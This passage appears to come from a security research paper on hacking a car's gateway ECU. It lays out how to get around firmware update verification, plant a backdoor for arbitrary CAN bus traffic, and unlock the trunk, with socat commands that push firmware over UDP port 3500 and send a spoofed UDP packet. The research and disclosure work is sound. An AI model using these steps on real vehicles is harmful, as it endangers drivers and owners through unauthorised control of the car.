– 9 –
A function pointer, which will process and flash the program. Most of them is 0x40029B1C, which
we named pektronUpdate
Configurations, for example if the BMS should be opened
Though there are some differences between different files, they are mainly following this procedure:
a) Convert hex file into binary stream;
b) For certain files, check if the file meets requirements;
c) Do some preparation jobs including turn off dangers relays, turn off battery, etc.
d) Send the firmware using UDS protocol. Under most situations, the updater is only responsible to
download the target hex to the chip. It will not care if the hex file is corrupted or not. The bootloader
on target’s chip is required to write the hex file into flash, and check if the application is valid every
time it boots up.
e) Check if the firmware is send to target ECU, and being programmed completely.
4. After all those files being processed, make a log, then restart
Besides, flashing the gateway is even more easier, since the program is running on the same target chip,
updater just needs to unlock the flash block, writes new data and re-lock it according to the manual of the
chip.
So here are our ways to flash customized firmware to gateway:
1. Modify firmware into our customized version. To prove we can do it, we’ve changed the CRC value of
ic.hex to 0xDEADBEEF, and also modified gtw.hex to open a backdoor, so we can send any frame
on the CAN bus even when the car is running (will be discussed later).
2. Recalculate the CRC value, or use some methods to generate collisions, which might be a wise choice
to prevent some hidden security checks.
3. Change manifest’s content and the CRC value. However, you can just make some modifications to
boot.img in order to skip some verification progress.
4. Pack those files into release.tgz and append corresponding CRC32 value.
5. transfer booted.img, release.tgz, service.upd into gateway.
6. printf "\x08booted.img" | socat - udp:gw:3500
By using those techniques to skip the update verification progress and programming our customized code
into ECUs, we can now run our code permanently on the ECU if we want. Some other potential problems
are still investigate including the possibility of flashing the bootloader, modify the car's configuration and
other software related jobs.
GATEWAY REVERSE ENGINEERING AND HACKING
We can find some vulnerabilities in many important tasks running on the gateway which can almost do any
kinds of communication to ECUs on the CAN bus. They will be listed as follows:
1. By the design that Gateway treats the UDP broadcast on 20100 and 20101 ports as a kind of CAN
message and transports them to the real CAN bus, we can easily fake some UDP signals to do some
motions like lock or unlock by sending a UDP. For example, we send a UDP as follow to open the trunk:
printf "\x00\x00\x02\x48\x04\x00\x30\x07\x00\xFF\xFF\x00" | socat -
udp:gw:20100